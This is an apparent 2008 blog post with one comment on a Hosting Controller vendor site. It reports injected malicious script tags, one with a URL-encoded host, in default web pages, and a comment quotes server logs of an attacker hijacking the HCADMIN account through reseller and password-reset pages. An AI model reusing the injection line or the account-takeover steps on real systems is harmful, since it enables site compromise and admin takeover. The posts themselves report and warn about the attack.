Buy
Schedule a Demo
Blog
Contact Us
HOSTING CONTROLLER
CLOUD AUTOMATION PLATFORM
Products
Solutions
Downloads
Support
Resources
About HC
Join us now!
Log in
/
Username
Password
Verification
Stay logged in
Login
Forgot Your Password?
Forgot your Username?
Haven't received registration validation E-mail?
User Control Panel
Log out
Forums
Posts
Latest Posts
Active Posts
Recently Visited
Search Results
View More
Blog
Recent Blog Posts
View More
Photos
Recent Photos
My Favorites
View More
Photo Galleries
PMs
Unread PMs
Inbox
Send New PM
View More
Page Extras
Menu
Forum Themes
Elegant
Progressive
Home
»
Blog
»
Bug in HC 6.1
Community Stats
1 day
7 days
30 days
Max.
View More
Top Posters
HC Team
(1 Recent Post)
Most Active Threads
Hosting Controller Panel v10 build 10.36 is now available
(1 Reply)
Top Rated Posts
There is no record available at this moment
2008/03/12 22:19:46
nitaish
Bug in HC 6.1
Hello,
There is a bug in the HC 6.1 version because of which all the default pages created by HC in the websites are getting injected by a script which goes as follows
<script src=http://yrwap.cn/h.js></script><script src=http://%79%72%77%61%70%2E%63%6E/h.js></script><script src=http://%79%72%77%61%70%2E%63%6E/h.js></script>
We request HC to look into it and fix it before it creates further problems.
An ICANN Accredited Domain name Registrar
- OwnRegistrar.com
|
Shared Hosting
|
Reseller hosting
|
Dedicated server
| - QualiSpace.com
Premium AntiSpam / AntiVirus gateway
- SpamTermino.com
Signup as a reseller and get domains only for $6.49
1 comment
Leave a comment
nextmill
There is a serious flaw in HC6.1 hf3.3 with post security updates (1/23/2008) that still hasn't been fixed... It was suppose to be fixed in the post hf 3.3 security fixes but was not fully fixed. Hackers continue to exploit this flaw and it seems HC doesn't care.
Here is the log of a recent exploit from TODAY of one of our customer's servers. Hacker is on ip 85.9.111.21 today. These logs show the hacker exploiting the addreseller.asp to change the email address on the HCADMIN user, then gets the form to send a password change link to that email address. I WISH HC would disable the ability to request a 'sent password' for HCADMIN, probably would be 1-2 lines of code to look to see if someone is submitting such a request to check the password for 'HCADMIN'
2008-12-06 20:31:54 W3SVC3 RAPTOR9 216.115.x.x POST /hosting/addreseller.asp htype=3 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 0 475 802 687
2008-12-06 20:31:57 W3SVC3 RAPTOR9 216.115.x.x GET /accounts/accountactions.asp ActionType=AddUser&hostingplantype=3&auto=1 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 0 553 607 1984
2008-12-06 20:34:09 W3SVC3 RAPTOR9 216.115.x.x GET /hosting/xml_addresellerresult.asp AddResult=70500010|-|ASP_0113|Script_timed_out 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 500 0 64 0 588 131437
2008-12-06 20:34:10 W3SVC3 RAPTOR9 216.115.x.x POST /accounts/AccountActions.asp ActionType=UpdateUser 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 64 0 748 114468
2008-12-06 20:34:10 W3SVC3 RAPTOR9 216.115.x.x POST /accounts/AccountActions.asp ActionType=UpdateUser 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 64 0 748 101843
2008-12-06 20:34:10 W3SVC3 RAPTOR9 216.115.x.x POST /accounts/AccountActions.asp ActionType=UpdateUser 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 64 0 748 87000
2008-12-06 20:34:12 W3SVC3 RAPTOR9 216.115.x.x POST /Check_Password.asp - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII
http://216.115.x.x:8077/
216.115.x.x:8077 302 0 0 433 713 33765
2008-12-06 20:34:12 W3SVC3 RAPTOR9 216.115.x.x POST /hosting/addreseller.asp htype=3 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 0 475 802 12203
2008-12-06 20:34:12 W3SVC3 RAPTOR9 216.115.x.x POST /accounts/AccountActions.asp ActionType=UpdateUser 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 0 511 748 10187
2008-12-06 20:34:12 W3SVC3 RAPTOR9 216.115.x.x GET /main.asp - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII
http://216.115.x.x:8077/
216.115.x.x:8077 200 0 0 1357 579 671
2008-12-06 20:34:12 W3SVC3 RAPTOR9 216.115.x.x GET /accounts/accountactions.asp ActionType=AddUser&hostingplantype=3&auto=1 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 0 553 607 703
2008-12-06 20:34:16 W3SVC3 RAPTOR9 216.115.x.x GET /Header.asp - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII
http://216.115.x.x:8077/main.asp
216.115.x.x:8077 200 0 0 2308 589 4125
2008-12-06 20:34:17 W3SVC3 RAPTOR9 216.115.x.x GET /accounts/AccountManager.asp UpdateResult=70500141&iconwebsite= 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 200 0 0 13455 597 5109
2008-12-06 20:34:27 W3SVC3 RAPTOR9 216.115.x.x POST /Check_Password.asp - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII
http://216.115.x.x:8077/
216.115.x.x:8077 302 0 1236 0 713 90531
2008-12-06 20:36:24 W3SVC3 RAPTOR9 216.115.x.x GET /hosting/xml_addresellerresult.asp AddResult=70500010|-|ASP_0113|Script_timed_out 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 500 0 0 680 588 131000
2008-12-06 20:36:26 W3SVC3 RAPTOR9 216.115.x.x GET /Header.asp - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII
http://216.115.x.x:8077/Header.asp
216.115.x.x:8077 200 0 0 2308 531 129484
2008-12-06 20:36:26 W3SVC3 RAPTOR9 216.115.x.x GET /skins/PanelXP/Blue/images/bgDotted.gif - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII
http://216.115.x.x:8077/Contents.asp
216.115.x.x:8077 200 0 0 296 591 453
2008-12-06 20:36:26 W3SVC3 RAPTOR9 216.115.x.x GET /skins/PanelXP/Blue/images/spacer.gif - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII
http://216.115.x.x:8077/Contents.asp
216.115.x.x:8077 200 0 0 290 589 453
2008-12-06 20:36:29 W3SVC3 RAPTOR9 216.115.x.x GET /space.gif - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII
http://216.115.x.x:8077/Contents.asp
216.115.x.x:8077 404 0 64 0 562 3578
2008-12-06 20:36:29 W3SVC3 RAPTOR9 216.115.x.x GET /skins/PanelXP/Blue/images/angle.gif - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII
http://216.115.x.x:8077/Header.asp
216.115.x.x:8077 200 0 0 345 586 2781
2008-12-06 20:36:30 W3SVC3 RAPTOR9 216.115.x.x GET /skins/PanelXP/Blue/images/TopImage.gif - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII
http://216.115.x.x:8077/Contents.asp
216.115.x.x:8077 200 0 0 1085 591 609
2008-12-06 20:36:30 W3SVC3 RAPTOR9 216.115.x.x GET /accounts/AccountManager.asp UpdateResult=70500141&iconwebsite= 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII
http://216.115.x.x:8077/accounts/AccountManager.asp?UpdateResult=70500141&iconwebsite=
216.115.x.x:8077 200 0 0 13455 635 132968
2008/06/12 17:22:44
Comments are closed.